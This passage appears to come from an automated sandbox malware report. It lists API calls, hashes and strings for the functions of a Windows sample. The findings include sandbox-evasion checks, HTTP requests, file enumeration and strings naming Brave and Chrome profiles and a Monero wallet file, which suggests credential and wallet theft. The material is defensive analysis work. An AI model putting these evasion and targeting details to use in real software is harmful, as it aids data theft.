                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00696AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00696AF9
                              • Sleep.KERNEL32(00001770), ref: 00696B04
                              • CloseHandle.KERNEL32(?,00000000,?,01488FA8,?,006A110C,?,00000000,?,006A1110,?,00000000,006A0AEF), ref: 00696B1A
                              • ExitProcess.KERNEL32 ref: 00696B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                              • Instruction ID: 8c01fd588db536af2437734a59a8990f06b9cad218f2416c73ffa25e9cda55a6
                              • Opcode Fuzzy Hash: 464179830521ef39ede81f5e4c1fa1c471822bc1ff69c807afb0e9f8edaff896
                              • Instruction Fuzzy Hash: B3F0B830A0030EABEF00ABA0CC0AFBE7B7EFB04304F104519B903A19C4DBB05501DAAA
                              Function 006847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: a6fc900078d9be24ea7f3cf10b1f4ae1c8da7f7f070a2f12304d9c8e9d666bf5
                              • Instruction ID: 867efd340e5c1c52f47eeb4b5413a94960eddc056f89b0aa2c19bf14cce01c58
                              • Opcode Fuzzy Hash: a6fc900078d9be24ea7f3cf10b1f4ae1c8da7f7f070a2f12304d9c8e9d666bf5
                              • Instruction Fuzzy Hash: 5A214FB1D00209ABDF14DFA4E845ADE7B79FB45320F108629F955A72C1EB706A05CF81
                              Function 006951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                                • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,0148E838), ref: 00686303
                                • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                                • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00686385
                                • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                                • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00695228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                              • Instruction ID: 5d5b572b2cc3f9ce8dcfdae00ede409e2a9a880bed4d0adc3af13e6d498735ff
                              • Opcode Fuzzy Hash: 20b89c8e7a1f5d4ece60ea0392f5c8ab62da7304406b28107d746b8ff5ddd64c
                              • Instruction Fuzzy Hash: C011DD70910148A7CF54FBA4DD52AED73BEAF50340F40416CF81A5A992EF30AB06CB9A
                              Function 006978E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                              • Instruction ID: 84f4f5950590af3fcd62e06a685c13f3f40b7809882887ca3e791feb8998aad7
                              • Opcode Fuzzy Hash: 6586e228a00279567a4fbc1d0b2926f1cefbe968649b0d427b019af112e60f48
                              • Instruction Fuzzy Hash: 8B0181B1A04208EBDB04DF98DD45FAABBBCFB04B25F10422AFA45E3680C37559008BA1
                              Function 00681110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0068112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00681132
                              • ExitProcess.KERNEL32 ref: 00681143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                              • Instruction ID: e32114407423f649bf08dcfb2e3fab7e1f295102d62e347a80f8e7a46b24d2ce
                              • Opcode Fuzzy Hash: b229a3b711e7f73f336dd37ba60da7b43cfafe9f9a87eda4e30a2dff09c6f120
                              • Instruction Fuzzy Hash: B9E0E67094530CFBE7546BA09C0EF49767CFB05B05F104154F7097A5D0D6B52A419799
                              Function 006810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006810B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006810F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                              • Instruction ID: abb53f2ab95196be0a43ee9829758997e9f1d0599a284dfdcc2df8f5da75049d
                              • Opcode Fuzzy Hash: b0bd933760dc070704358c37edaa009eea0e5388c2f57b00394a101063807f63
                              • Instruction Fuzzy Hash: FBF0E271641208BBEB14ABA8AC49FAAB7ECE706B15F300548F504E7280D9729E00CBA4
                              Function 00681190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 006978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697910
                                • Part of subcall function 006978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00697917
                                • Part of subcall function 006978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0069792F
                                • Part of subcall function 00697850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697880
                                • Part of subcall function 00697850: RtlAllocateHeap.NTDLL(00000000), ref: 00697887
                                • Part of subcall function 00697850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0069789F
                              • ExitProcess.KERNEL32 ref: 006811C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                              • Instruction ID: 86063916dce87cf05e20b9b666490c98c209b118acc6fd5ea155ea3d57d60522
                              • Opcode Fuzzy Hash: a6b69b9f34c7656981b521422e33e9b8e7413bf31a27caa175a191343be9bfbf
                              • Instruction Fuzzy Hash: 2CE0ECB592420956CE4473B0AD0AF2A32AE6B16749F040539BA05D6602FA25E801866E

                              Non-executed Functions

                              Function 006938B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 006938CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 006938E3
                              • lstrcat.KERNEL32(?,?), ref: 00693935
                              • StrCmpCA.SHLWAPI(?,006A0F70), ref: 00693947
                              • StrCmpCA.SHLWAPI(?,006A0F74), ref: 0069395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00693C67
                              • FindClose.KERNEL32(000000FF), ref: 00693C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                              • Instruction ID: 9e8026a8da236e06e74ec0958f162d4e6fa059cd7c6249f7482866e4fd388306
                              • Opcode Fuzzy Hash: dada1de0d4af592c62ca3c2be2859d3e9b4c1b1e2f2bab803fea54ac6b68f73c
                              • Instruction Fuzzy Hash: 5CA161B19002189FDF24EFA4DC85FEA737DFB54300F044588A60DA6641EB759B84CFA2
                              Function 0068BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,006A0B32,006A0B2B,00000000,?,?,?,006A13F4,006A0B2A), ref: 0068BEF5
                              • StrCmpCA.SHLWAPI(?,006A13F8), ref: 0068BF4D
                              • StrCmpCA.SHLWAPI(?,006A13FC), ref: 0068BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0068C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                              • Instruction ID: bb528bd5f694eb06a99d664f57c8e545f037bc76af6a54cc0e6b57642ce28442
                              • Opcode Fuzzy Hash: 5a8719cd3608e571f53e8d2140fbd1cf3b0c96c7d329ac7ce8a4f92cec8149d6
                              • Instruction Fuzzy Hash: 974252729101089BDF54FBF0DD96EED73BEAB44300F40465CB90AA6581EE349B49CBE6
                              Function 00694910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0069492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00694943
                              • StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                              • StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                              • FindClose.KERNEL32(000000FF), ref: 00694B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                              • Instruction ID: 78fc735b6ace992c67b08d689b94c499c69758d53faaadf73f85c9bc69124622
                              • Opcode Fuzzy Hash: 1a4724820192dff018d151a69397fd339d6e748aa5279ba3076b4a632488a8dc
                              • Instruction Fuzzy Hash: E56144B1900218ABCB24EBA0DC49EEA73BDBB49704F04859CB549A6141EF75DB45CF91
                              Function 00694570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
